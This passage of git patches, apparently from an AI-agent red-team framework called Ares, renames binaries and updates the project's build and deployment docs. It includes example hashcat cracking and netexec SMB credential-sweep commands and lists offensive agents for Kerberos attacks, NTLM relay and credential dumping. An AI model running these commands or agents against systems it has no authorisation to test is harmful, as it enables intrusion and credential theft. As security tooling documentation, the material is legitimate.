AMI (all tools) ``` @@ -93,7 +93,7 @@ nvidia/cuda:12.6.0-runtime-ubuntu24.04 └── ares-python-cracker-agent-gpu (+john, wordlists) debian:bookworm-slim - └── ares-python-orchestrator (Rust binary, no Ansible) + └── ares-orchestrator (unified `ares` binary, no Ansible) kalilinux/kali-rolling (AMI) └── ares-golden-image (all red team tools in one EC2 AMI) @@ -168,7 +168,7 @@ GPU templates (`ares-python-cracker-agent-gpu`, `ares-python-cracker-base-gpu`) The `tools.yaml` file at the repo root is the single source of truth for which binaries are expected per role. The build scripts -(`ares-worker/build.rs`, `ares-core/build.rs`) validate against it. +(`ares-cli/build.rs`, `ares-core/build.rs`) validate against it. ## Ansible Collection Details @@ -231,7 +231,8 @@ kubectl run ares-orchestrator \ --image=ghcr.io/dreadnode/ares-python-orchestrator:latest \ -it --rm \ --env="REDIS_URL=redis://redis:6379" \ - --env="ANTHROPIC_API_KEY=$ANTHROPIC_API_KEY" + --env="ANTHROPIC_API_KEY=$ANTHROPIC_API_KEY" \ + -- ares orchestrator # Worker deployment (long-running) kubectl create deployment ares-recon \ @@ -247,15 +248,18 @@ services: ports: ["6379:6379"] orchestrator: - image: ghcr.io/dreadnode/ares-python-orchestrator:latest + image: ghcr.io/dreadnode/ares-orchestrator:latest + command: ["ares", "orchestrator"] environment: REDIS_URL: redis://redis:6379 ANTHROPIC_API_KEY: ${ANTHROPIC_API_KEY} depends_on: [redis] recon-worker: - image: ghcr.io/dreadnode/ares-python-recon-agent:latest + image: ghcr.io/dreadnode/ares-recon-agent:latest + command: ["ares", "worker"] environment: REDIS_URL: redis://redis:6379 + ARES_WORKER_ROLE: recon depends_on: [redis] ``` diff --git a/docs/red.md b/docs/red.md index 4cf2d02e..36536cea 100644 --- a/docs/red.md +++ b/docs/red.md @@ -90,7 +90,7 @@ tool assignments. For detailed responsibilities, see sections below. - **Pod selectors**: `config/ares.yaml` - **Tool assignments**: `config/ares.yaml` → per-agent `capabilities` - **Max steps defaults**: `config/ares.yaml` → per-agent `max_steps` -- **Agent instructions**: `ares-orchestrator/src/` prompt templates +- **Agent instructions**: `ares-cli/src/orchestrator/` prompt templates ### Model Selection @@ -623,16 +623,16 @@ kubectl -n attack-simulation exec -it ares-recon-agent-0 -- \ **Core Components**: -- `ares-orchestrator/src/` - Main orchestrator coordination loop, task dispatch, LLM runner -- `ares-orchestrator/src/dispatcher/` - Task routing, throttling, and state management -- `ares-orchestrator/src/state/` - Operation state management -- `ares-orchestrator/src/config.rs` - Orchestrator configuration -- `ares-worker/src/` - Worker agent task loop, tool execution +- `ares-cli/src/orchestrator/` - Main orchestrator coordination loop, task dispatch, LLM runner +- `ares-cli/src/orchestrator/dispatcher/` - Task routing, throttling, and state management +- `ares-cli/src/orchestrator/state/` - Operation state management +- `ares-cli/src/orchestrator/config.rs` - Orchestrator configuration +- `ares-cli/src/worker/` - Worker agent task loop, tool execution - `ares-core/src/` - Shared models, state, Redis schema, telemetry **CLI**: -- `ares-cli/src/cli.rs` - CLI command definitions +- `ares-cli/src/cli/` - CLI command definitions - `ares-cli/src/ops/` - Red team operation commands - `ares-cli/src/blue/` - Blue team investigation commands - `ares-cli/src/transport.rs` - K8s/EC2 transport layer @@ -650,7 +650,7 @@ availability can vary by distro and role flags. All agents inherit these foundational tools: -- **Runtime**: Rust binaries (ares-worker), python3, pip3 +- **Runtime**: Rust binary (`ares worker`), python3, pip3 - **Utilities**: git, curl, wget, netcat-traditional, vim, jq, tmux, htop - **Network diagnostics**: dnsutils (dig, nslookup), net-tools, iproute2, tcpdump, telnet - **Debugging**: procps (ps, top), strace, lsof @@ -658,7 +658,7 @@ All agents inherit these foundational tools: ### Orchestrator Service Pod -- **Runtime**: Rust binary (ares-orchestrator) +- **Runtime**: Rust binary (`ares orchestrator`) - **Redis client**: For dispatcher and state management - **No pentesting tools**: Orchestrator only coordinates, never executes tools directly diff --git a/tools.yaml b/tools.yaml index 2766fc44..51c7d109 100644 --- a/tools.yaml +++ b/tools.yaml @@ -5,7 +5,7 @@ # Rust tool function names to their binary, category, and role. # # Two build scripts consume this file: -# - ares-worker/build.rs → tools_for_role() binary availability check +# - ares-cli/build.rs → tools_for_role() binary availability check # - ares-core/build.rs → tool_meta() telemetry/OTel span enrichment # # When Ansible provisioning changes, update THIS file — the generated From 22e3c2f5d2a731b06204618d13dc3e2780002498 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 10:47:13 -0600 Subject: [PATCH 04/10] docs: update references to Rust agent/orchestrator/worker binaries as `ares` CLI **Changed:** - Standardized documentation references for Rust agent/orchestrator/worker binaries to use the unified `ares` CLI syntax (e.g., `ares worker` or `ares orchestrator`) instead of legacy binary names like `ares-worker` or `ares-orchestrator` across all relevant README files - Updated example commands, directory structure listings, and descriptive sections to reflect the new CLI approach, improving clarity and consistency for users and aligning with current project naming conventions - Enhanced agent/orchestrator documentation tables to clarify invocation patterns with the new CLI format --- warpgate-templates/README.md | 86 +++++++++---------- .../templates/ares-acl-agent/README.md | 4 +- .../templates/ares-blue-agent/README.md | 38 ++++---- .../ares-blue-lateral-analyst-agent/README.md | 42 ++++----- .../ares-blue-threat-hunter-agent/README.md | 42 ++++----- .../ares-blue-triage-agent/README.md | 42 ++++----- .../templates/ares-cli/README.md | 10 +-- .../templates/ares-coercion-agent/README.md | 4 +- .../ares-cracker-agent-gpu/README.md | 47 +++++----- .../templates/ares-cracker-agent/README.md | 4 +- .../ares-credential-access-agent/README.md | 4 +- .../ares-lateral-movement-agent/README.md | 4 +- .../templates/ares-orchestrator/README.md | 60 ++++++------- .../templates/ares-privesc-agent/README.md | 4 +- .../templates/ares-recon-agent/README.md | 4 +- .../templates/ares-worker/README.md | 58 ++++++------- 16 files changed, 227 insertions(+), 226 deletions(-) diff --git a/warpgate-templates/README.md b/warpgate-templates/README.md index 75575719..f3a649fe 100644 --- a/warpgate-templates/README.md +++ b/warpgate-templates/README.md @@ -30,10 +30,10 @@ Templates support multi-architecture builds (amd64/arm64) where applicable and a go install github.com/CowDogMoo/warpgate/cmd/warpgate@latest # Build an Ares agent -warpgate build templates/ares-python-base/warpgate.yaml --arch amd64 +warpgate build templates/ares-base/warpgate.yaml --arch amd64 # Build and push to registry -warpgate build templates/ares-python-recon-agent/warpgate.yaml \ +warpgate build templates/ares-recon-agent/warpgate.yaml \ --arch amd64 \ --registry ghcr.io/dreadnode \ --push @@ -45,32 +45,32 @@ warpgate build templates/ares-python-recon-agent/warpgate.yaml \ | Template | Description | Base Image | Platforms | | -------- | ----------- | ---------- | --------- | -| [ares-python-base](./templates/ares-python-base) | Base Ares framework with Python and core dependencies | kalilinux/kali-rolling | Container (amd64, arm64) | -| [ares-python-orchestrator](./templates/ares-python-orchestrator) | Redis-based multi-agent coordinator | python:3.13.7-slim | Container (amd64, arm64) | -| [ares-python-worker](./templates/ares-python-worker) | Task polling agent for orchestration | ares-python-base | Container (amd64, arm64) | -| [ares-python-acl-agent](./templates/ares-python-acl-agent) | Active Directory ACL exploitation agent | ares-python-base | Container (amd64, arm64) | -| [ares-python-coercion-agent](./templates/ares-python-coercion-agent) | NTLM relay and authentication coercion tools | ares-python-base | Container (amd64, arm64) | -| [ares-python-cracker-agent](./templates/ares-python-cracker-agent) | Password cracking agent with hashcat and john | ares-python-base | Container (amd64, arm64) | -| [ares-python-credential-access-agent](./templates/ares-python-credential-access-agent) | Kerberos attacks and credential dumping tools | ares-python-base | Container (amd64, arm64) | -| [ares-python-lateral-movement-agent](./templates/ares-python-lateral-movement-agent) | Post-exploitation lateral movement tools | ares-python-base | Container (amd64, arm64) | -| [ares-python-privesc-agent](./templates/ares-python-privesc-agent) | Privilege escalation tools | ares-python-base | Container (amd64, arm64) | -| [ares-python-recon-agent](./templates/ares-python-recon-agent) | Network reconnaissance and AD enumeration tools | ares-python-base | Container (amd64, arm64) | +| [ares-base](./templates/ares-base) | Base Ares framework with Python and core dependencies | kalilinux/kali-rolling | Container (amd64, arm64) | +| [ares-orchestrator](./templates/ares-orchestrator) | Redis-based multi-agent coordinator (`ares orchestrator`) | python:3.13.7-slim | Container (amd64, arm64) | +| [ares-worker](./templates/ares-worker) | Task polling agent for orchestration (`ares worker`) | ares-base | Container (amd64, arm64) | +| [ares-acl-agent](./templates/ares-acl-agent) | Active Directory ACL exploitation agent | ares-base | Container (amd64, arm64) | +| [ares-coercion-agent](./templates/ares-coercion-agent) | NTLM relay and authentication coercion tools | ares-base | Container (amd64, arm64) | +| [ares-cracker-agent](./templates/ares-cracker-agent) | Password cracking agent with hashcat and john | ares-base | Container (amd64, arm64) | +| [ares-credential-access-agent](./templates/ares-credential-access-agent) | Kerberos attacks and credential dumping tools | ares-base | Container (amd64, arm64) | +| [ares-lateral-movement-agent](./templates/ares-lateral-movement-agent) | Post-exploitation lateral movement tools | ares-base | Container (amd64, arm64) | +| [ares-privesc-agent](./templates/ares-privesc-agent) | Privilege escalation tools | ares-base | Container (amd64, arm64) | +| [ares-recon-agent](./templates/ares-recon-agent) | Network reconnaissance and AD enumeration tools | ares-base | Container (amd64, arm64) | ### Ares Blue Team Templates | Template | Description | Base Image | Platforms | | -------- | ----------- | ---------- | --------- | -| [ares-python-blue-agent](./templates/ares-python-blue-agent) | Defensive security operations agent | ares-python-base | Container (amd64, arm64) | -| [ares-python-blue-triage-agent](./templates/ares-python-blue-triage-agent) | Initial incident assessment and alerting | ares-python-base | Container (amd64, arm64) | -| [ares-python-blue-threat-hunter-agent](./templates/ares-python-blue-threat-hunter-agent) | Proactive threat detection and investigation | ares-python-base | Container (amd64, arm64) | -| [ares-python-blue-lateral-analyst-agent](./templates/ares-python-blue-lateral-analyst-agent) | Lateral movement detection and analysis | ares-python-base | Container (amd64, arm64) | +| [ares-blue-agent](./templates/ares-blue-agent) | Defensive security operations agent | ares-base | Container (amd64, arm64) | +| [ares-blue-triage-agent](./templates/ares-blue-triage-agent) | Initial incident assessment and alerting | ares-base | Container (amd64, arm64) | +| [ares-blue-threat-hunter-agent](./templates/ares-blue-threat-hunter-agent) | Proactive threat detection and investigation | ares-base | Container (amd64, arm64) | +| [ares-blue-lateral-analyst-agent](./templates/ares-blue-lateral-analyst-agent) | Lateral movement detection and analysis | ares-base | Container (amd64, arm64) | ### GPU-Accelerated Cracking Templates | Template | Description | Base Image | Platforms | | -------- | ----------- | ---------- | --------- | -| [ares-python-cracker-base-gpu](./templates/ares-python-cracker-base-gpu) | Base image with CUDA/OpenCL GPU-accelerated hashcat | nvidia/cuda:12.6.0-runtime-ubuntu24.04 | Container (amd64) | -| [ares-python-cracker-agent-gpu](./templates/ares-python-cracker-agent-gpu) | Ares cracking agent with GPU-accelerated hashcat | ares-python-cracker-base-gpu | Container (amd64) | +| [ares-cracker-base-gpu](./templates/ares-cracker-base-gpu) | Base image with CUDA/OpenCL GPU-accelerated hashcat | nvidia/cuda:12.6.0-runtime-ubuntu24.04 | Container (amd64) | +| [ares-cracker-agent-gpu](./templates/ares-cracker-agent-gpu) | Ares cracking agent with GPU-accelerated hashcat | ares-cracker-base-gpu | Container (amd64) | ### Ray Cluster Templates @@ -146,23 +146,23 @@ warpgate build templates/ares-python-recon-agent/warpgate.yaml \ ```bash # Single architecture -warpgate build templates/ares-python-base/warpgate.yaml --arch amd64 +warpgate build templates/ares-base/warpgate.yaml --arch amd64 # Multi-architecture -warpgate build templates/ares-python-base/warpgate.yaml --arch amd64,arm64 +warpgate build templates/ares-base/warpgate.yaml --arch amd64,arm64 ``` #### Build Specialized Agents ```bash # Cracker agent for password recovery -warpgate build templates/ares-python-cracker-agent/warpgate.yaml \ +warpgate build templates/ares-cracker-agent/warpgate.yaml \ --arch amd64 \ --registry ghcr.io/dreadnode \ --push # Recon agent for network reconnaissance -warpgate build templates/ares-python-recon-agent/warpgate.yaml \ +warpgate build templates/ares-recon-agent/warpgate.yaml \ --arch amd64 \ --registry ghcr.io/dreadnode \ --push @@ -172,19 +172,19 @@ warpgate build templates/ares-python-recon-agent/warpgate.yaml \ ```bash # Run base agent -docker run -it ghcr.io/dreadnode/ares-python-base:latest bash +docker run -it ghcr.io/dreadnode/ares-base:latest bash # Run cracking workload -docker run -it ghcr.io/dreadnode/ares-python-cracker-agent:latest \ +docker run -it ghcr.io/dreadnode/ares-cracker-agent:latest \ hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt # Run reconnaissance scan -docker run -it ghcr.io/dreadnode/ares-python-recon-agent:latest \ +docker run -it ghcr.io/dreadnode/ares-recon-agent:latest \ netexec smb 192.168.1.0/24 -u user -p password # Orchestrate multiple agents for comprehensive assessment -docker run -d ghcr.io/dreadnode/ares-python-recon-agent:latest netexec smb 192.168.1.0/24 -docker run -d ghcr.io/dreadnode/ares-python-cracker-agent:latest hashcat -m 1000 hashes.txt +docker run -d ghcr.io/dreadnode/ares-recon-agent:latest netexec smb 192.168.1.0/24 +docker run -d ghcr.io/dreadnode/ares-cracker-agent:latest hashcat -m 1000 hashes.txt ``` ## Template Structure @@ -282,22 +282,22 @@ warpgate validate templates/your-template/warpgate.yaml ```text warpgate-templates/ ├── templates/ # All template definitions -│ ├── ares-python-base/ # Ares framework base image -│ ├── ares-python-orchestrator/ # Multi-agent coordinator -│ ├── ares-python-worker/ # Task polling agent -│ ├── ares-python-acl-agent/ # AD ACL exploitation -│ ├── ares-python-blue-agent/ # Blue team defensive agent -│ ├── ares-python-blue-lateral-analyst-agent/ # Lateral movement analysis -│ ├── ares-python-blue-threat-hunter-agent/ # Proactive threat hunting -│ ├── ares-python-blue-triage-agent/ # Incident triage -│ ├── ares-python-coercion-agent/ # NTLM relay tools -│ ├── ares-python-cracker-agent/ # Password cracking (CPU) -│ ├── ares-python-cracker-agent-gpu/ # Password cracking (GPU) -│ ├── ares-python-cracker-base-gpu/ # GPU hashcat base image -│ ├── ares-python-credential-access-agent/ # Kerberos attacks -│ ├── ares-python-lateral-movement-agent/ # Post-exploitation -│ ├── ares-python-privesc-agent/ # Privilege escalation -│ ├── ares-python-recon-agent/ # Network reconnaissance +│ ├── ares-base/ # Ares framework base image +│ ├── ares-orchestrator/ # Multi-agent coordinator +│ ├── ares-worker/ # Task polling agent +│ ├── ares-acl-agent/ # AD ACL exploitation +│ ├── ares-blue-agent/ # Blue team defensive agent +│ ├── ares-blue-lateral-analyst-agent/ # Lateral movement analysis +│ ├── ares-blue-threat-hunter-agent/ # Proactive threat hunting +│ ├── ares-blue-triage-agent/ # Incident triage +│ ├── ares-coercion-agent/ # NTLM relay tools +│ ├── ares-cracker-agent/ # Password cracking (CPU) +│ ├── ares-cracker-agent-gpu/ # Password cracking (GPU) +│ ├── ares-cracker-base-gpu/ # GPU hashcat base image +│ ├── ares-credential-access-agent/ # Kerberos attacks +│ ├── ares-lateral-movement-agent/ # Post-exploitation +│ ├── ares-privesc-agent/ # Privilege escalation +│ ├── ares-recon-agent/ # Network reconnaissance │ ├── crucible-challenge-core/ # FastAPI challenge base │ ├── crucible-challenge-torch/ # Challenge with PyTorch CPU │ ├── crucible-challenge-torch-gpu/ # Challenge with PyTorch GPU diff --git a/warpgate-templates/templates/ares-acl-agent/README.md b/warpgate-templates/templates/ares-acl-agent/README.md index 256f3344..f7dd8d68 100644 --- a/warpgate-templates/templates/ares-acl-agent/README.md +++ b/warpgate-templates/templates/ares-acl-agent/README.md @@ -102,14 +102,14 @@ warpgate validate ares-acl-agent - `ares_acl_tools` - bloodyAD, pywhisker - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **bloodyAD** - Active Directory ACL exploitation framework - **pywhisker** - Shadow credentials manipulation tool - **Directory Structure:** - `/ares/` - Main Ares workspace directory - `/ares/.venv/` - Python virtual environment - - `/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-blue-agent/README.md b/warpgate-templates/templates/ares-blue-agent/README.md index 8ca35c8d..48159cbd 100644 --- a/warpgate-templates/templates/ares-blue-agent/README.md +++ b/warpgate-templates/templates/ares-blue-agent/README.md @@ -1,6 +1,6 @@ -# Ares Blue Agent Warp Gate Template +# Ares Rust Blue Agent Warp Gate Template -This template builds **Ares Blue Agent** images using Warp Gate. It supports +This template builds **Ares Rust Blue Agent** images using Warp Gate. It supports building **Docker images** (for `amd64` and `arm64`). The blue team agent performs defensive security operations using a compiled Rust binary with embedded Python. @@ -20,7 +20,7 @@ defensive security operations using a compiled Rust binary with embedded Python. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-blue-agent`) +- `name`: Template name (`ares-rust-blue-agent`) - `base.image`: Base Docker image (`ares-base`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -29,24 +29,24 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Blue Agent** Docker images for `amd64` and `arm64` +This builds **Ares Rust Blue Agent** Docker images for `amd64` and `arm64` architectures, compiles the Rust worker binary with Python bindings, and configures it for defensive security operations. **Initialize the template:** ```bash -warpgate init ares-blue-agent +warpgate init ares-rust-blue-agent ``` **Build Docker images:** ```bash -warpgate build ares-blue-agent --only 'docker.*' +warpgate build ares-rust-blue-agent --only 'docker.*' ``` -After the build, Ares Blue Agent Docker images will be available -locally as `ares-blue-agent:latest`. +After the build, Ares Rust Blue Agent Docker images will be available +locally as `ares-rust-blue-agent:latest`. --- @@ -59,10 +59,10 @@ After building the image, you can test it locally: docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-blue-agent:latest + ares-rust-blue-agent:latest # Verify the Rust binary is available -docker run --rm ares-blue-agent:latest ares-worker --version +docker run --rm ares-rust-blue-agent:latest ares worker --version ``` --- @@ -73,25 +73,25 @@ docker run --rm ares-blue-agent:latest ares-worker --version - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-worker` (compiled Rust binary) + - Entrypoint: `ares worker` (compiled Rust binary) - **Installed Components:** - - Provided by `ares-python-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) + - Rust-compiled `ares` binary with PyO3 Python bindings - **Build Process:** - Clones ares repository from `feature/rust-cli` branch - Compiles Rust binary with `--features python` for Python interop - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up build artifacts (source, compiler symlinks) --- ## Differences from ares-blue-agent (Python) -| Component | ares-blue-agent (Python) | ares-blue-agent | -| ---------- | ----------------------------------- | ------------------------------- | -| Entrypoint | `python -m ares --args.multi-agent` | `ares-worker` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | No compilation needed | Rust compilation with PyO3 | +| Component | ares-blue-agent (Python) | ares-rust-blue-agent | +| ----------- | ---------------------- | ------------------ | +| Entrypoint | `python -m ares --args.multi-agent` | `ares worker` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | No compilation needed | Rust compilation with PyO3 | --- diff --git a/warpgate-templates/templates/ares-blue-lateral-analyst-agent/README.md b/warpgate-templates/templates/ares-blue-lateral-analyst-agent/README.md index 00467f1e..256ee88e 100644 --- a/warpgate-templates/templates/ares-blue-lateral-analyst-agent/README.md +++ b/warpgate-templates/templates/ares-blue-lateral-analyst-agent/README.md @@ -1,6 +1,6 @@ -# Ares Blue Lateral Analyst Agent Warp Gate Template +# Ares Rust Blue Lateral Analyst Agent Warp Gate Template -This template builds **Ares Blue Lateral Analyst Agent** images using Warp Gate. It supports +This template builds **Ares Rust Blue Lateral Analyst Agent** images using Warp Gate. It supports building **Docker images** (for `amd64` and `arm64`). The lateral analyst agent detects and analyzes lateral movement using a compiled Rust binary with embedded Python and Grafana MCP integration. @@ -21,7 +21,7 @@ Grafana MCP integration. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-blue-lateral-analyst-agent`) +- `name`: Template name (`ares-rust-blue-lateral-analyst-agent`) - `base.image`: Base Docker image (`ares-base`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -30,24 +30,24 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Blue Lateral Analyst Agent** Docker images for `amd64` and `arm64` +This builds **Ares Rust Blue Lateral Analyst Agent** Docker images for `amd64` and `arm64` architectures, installs Grafana MCP tooling, compiles the Rust worker binary with Python bindings, and configures it for lateral movement analysis. **Initialize the template:** ```bash -warpgate init ares-blue-lateral-analyst-agent +warpgate init ares-rust-blue-lateral-analyst-agent ``` **Build Docker images:** ```bash -warpgate build ares-blue-lateral-analyst-agent --only 'docker.*' +warpgate build ares-rust-blue-lateral-analyst-agent --only 'docker.*' ``` After the build, Docker images will be available locally as -`ares-blue-lateral-analyst-agent:latest`. +`ares-rust-blue-lateral-analyst-agent:latest`. --- @@ -60,18 +60,18 @@ After building the image, you can test it locally: docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-blue-lateral-analyst-agent:latest + ares-rust-blue-lateral-analyst-agent:latest # Verify installed components -docker run --rm ares-blue-lateral-analyst-agent:latest ares-worker --version -docker run --rm --entrypoint mcp-grafana ares-blue-lateral-analyst-agent:latest --version +docker run --rm ares-rust-blue-lateral-analyst-agent:latest ares worker --version +docker run --rm --entrypoint mcp-grafana ares-rust-blue-lateral-analyst-agent:latest --version ``` --- ## Installed Tools -- **ares-worker** - Rust-compiled worker binary with PyO3 Python bindings +- **ares** - Rust-compiled binary with PyO3 Python bindings - **mcp-grafana** - Grafana MCP server for observability integration - **Ares Python framework** - Agent orchestration and tool execution @@ -83,28 +83,28 @@ docker run --rm --entrypoint mcp-grafana ares-blue-lateral-analyst-agent:latest - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-worker` (compiled Rust binary) + - Entrypoint: `ares worker` (compiled Rust binary) - **Installed Components:** - - Provided by `ares-python-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) + - Rust-compiled `ares` binary with PyO3 Python bindings - `mcp-grafana` for Grafana observability integration - **Build Process:** - Installs `mcp-grafana` binary (architecture-specific) - Clones ares repository from `feature/rust-cli` branch - Compiles Rust binary with `--features python` for Python interop - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up build artifacts --- ## Differences from ares-blue-lateral-analyst-agent (Python) -| Component | Python | Rust | -| ----------- | ----------------------------------- | ------------------------------- | -| Entrypoint | `python -m ares --args.multi-agent` | `ares-worker` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | No compilation needed | Rust compilation with PyO3 | -| mcp-grafana | Included | Included | +| Component | Python | Rust | +| ----------- | ---------------------- | ------------------ | +| Entrypoint | `python -m ares --args.multi-agent` | `ares worker` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | No compilation needed | Rust compilation with PyO3 | +| mcp-grafana | Included | Included | --- diff --git a/warpgate-templates/templates/ares-blue-threat-hunter-agent/README.md b/warpgate-templates/templates/ares-blue-threat-hunter-agent/README.md index dc6fce51..7e12f53d 100644 --- a/warpgate-templates/templates/ares-blue-threat-hunter-agent/README.md +++ b/warpgate-templates/templates/ares-blue-threat-hunter-agent/README.md @@ -1,6 +1,6 @@ -# Ares Blue Threat Hunter Agent Warp Gate Template +# Ares Rust Blue Threat Hunter Agent Warp Gate Template -This template builds **Ares Blue Threat Hunter Agent** images using Warp Gate. It supports +This template builds **Ares Rust Blue Threat Hunter Agent** images using Warp Gate. It supports building **Docker images** (for `amd64` and `arm64`). The threat hunter agent performs proactive threat detection and investigation using a compiled Rust binary with embedded Python and Grafana MCP integration. @@ -21,7 +21,7 @@ Python and Grafana MCP integration. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-blue-threat-hunter-agent`) +- `name`: Template name (`ares-rust-blue-threat-hunter-agent`) - `base.image`: Base Docker image (`ares-base`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -30,24 +30,24 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Blue Threat Hunter Agent** Docker images for `amd64` and `arm64` +This builds **Ares Rust Blue Threat Hunter Agent** Docker images for `amd64` and `arm64` architectures, installs Grafana MCP tooling, compiles the Rust worker binary with Python bindings, and configures it for threat hunting operations. **Initialize the template:** ```bash -warpgate init ares-blue-threat-hunter-agent +warpgate init ares-rust-blue-threat-hunter-agent ``` **Build Docker images:** ```bash -warpgate build ares-blue-threat-hunter-agent --only 'docker.*' +warpgate build ares-rust-blue-threat-hunter-agent --only 'docker.*' ``` After the build, Docker images will be available locally as -`ares-blue-threat-hunter-agent:latest`. +`ares-rust-blue-threat-hunter-agent:latest`. --- @@ -60,18 +60,18 @@ After building the image, you can test it locally: docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-blue-threat-hunter-agent:latest + ares-rust-blue-threat-hunter-agent:latest # Verify installed components -docker run --rm ares-blue-threat-hunter-agent:latest ares-worker --version -docker run --rm --entrypoint mcp-grafana ares-blue-threat-hunter-agent:latest --version +docker run --rm ares-rust-blue-threat-hunter-agent:latest ares worker --version +docker run --rm --entrypoint mcp-grafana ares-rust-blue-threat-hunter-agent:latest --version ``` --- ## Installed Tools -- **ares-worker** - Rust-compiled worker binary with PyO3 Python bindings +- **ares** - Rust-compiled binary with PyO3 Python bindings - **mcp-grafana** - Grafana MCP server for observability integration - **Ares Python framework** - Agent orchestration and tool execution @@ -83,28 +83,28 @@ docker run --rm --entrypoint mcp-grafana ares-blue-threat-hunter-agent:latest -- - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-worker` (compiled Rust binary) + - Entrypoint: `ares worker` (compiled Rust binary) - **Installed Components:** - - Provided by `ares-python-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) + - Rust-compiled `ares` binary with PyO3 Python bindings - `mcp-grafana` for Grafana observability integration - **Build Process:** - Installs `mcp-grafana` binary (architecture-specific) - Clones ares repository from `feature/rust-cli` branch - Compiles Rust binary with `--features python` for Python interop - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up build artifacts --- ## Differences from ares-blue-threat-hunter-agent (Python) -| Component | Python | Rust | -| ----------- | ----------------------------------- | ------------------------------- | -| Entrypoint | `python -m ares --args.multi-agent` | `ares-worker` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | No compilation needed | Rust compilation with PyO3 | -| mcp-grafana | Included | Included | +| Component | Python | Rust | +| ----------- | ---------------------- | ------------------ | +| Entrypoint | `python -m ares --args.multi-agent` | `ares worker` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | No compilation needed | Rust compilation with PyO3 | +| mcp-grafana | Included | Included | --- diff --git a/warpgate-templates/templates/ares-blue-triage-agent/README.md b/warpgate-templates/templates/ares-blue-triage-agent/README.md index d1570f04..3c51a79f 100644 --- a/warpgate-templates/templates/ares-blue-triage-agent/README.md +++ b/warpgate-templates/templates/ares-blue-triage-agent/README.md @@ -1,6 +1,6 @@ -# Ares Blue Triage Agent Warp Gate Template +# Ares Rust Blue Triage Agent Warp Gate Template -This template builds **Ares Blue Triage Agent** images using Warp Gate. It supports +This template builds **Ares Rust Blue Triage Agent** images using Warp Gate. It supports building **Docker images** (for `amd64` and `arm64`). The triage agent performs initial incident assessment and alerting using a compiled Rust binary with embedded Python and Grafana MCP integration. @@ -21,7 +21,7 @@ Grafana MCP integration. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-blue-triage-agent`) +- `name`: Template name (`ares-rust-blue-triage-agent`) - `base.image`: Base Docker image (`ares-base`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -30,24 +30,24 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Blue Triage Agent** Docker images for `amd64` and `arm64` +This builds **Ares Rust Blue Triage Agent** Docker images for `amd64` and `arm64` architectures, installs Grafana MCP tooling, compiles the Rust worker binary with Python bindings, and configures it for incident triage operations. **Initialize the template:** ```bash -warpgate init ares-blue-triage-agent +warpgate init ares-rust-blue-triage-agent ``` **Build Docker images:** ```bash -warpgate build ares-blue-triage-agent --only 'docker.*' +warpgate build ares-rust-blue-triage-agent --only 'docker.*' ``` After the build, Docker images will be available locally as -`ares-blue-triage-agent:latest`. +`ares-rust-blue-triage-agent:latest`. --- @@ -60,18 +60,18 @@ After building the image, you can test it locally: docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-blue-triage-agent:latest + ares-rust-blue-triage-agent:latest # Verify installed components -docker run --rm ares-blue-triage-agent:latest ares-worker --version -docker run --rm --entrypoint mcp-grafana ares-blue-triage-agent:latest --version +docker run --rm ares-rust-blue-triage-agent:latest ares worker --version +docker run --rm --entrypoint mcp-grafana 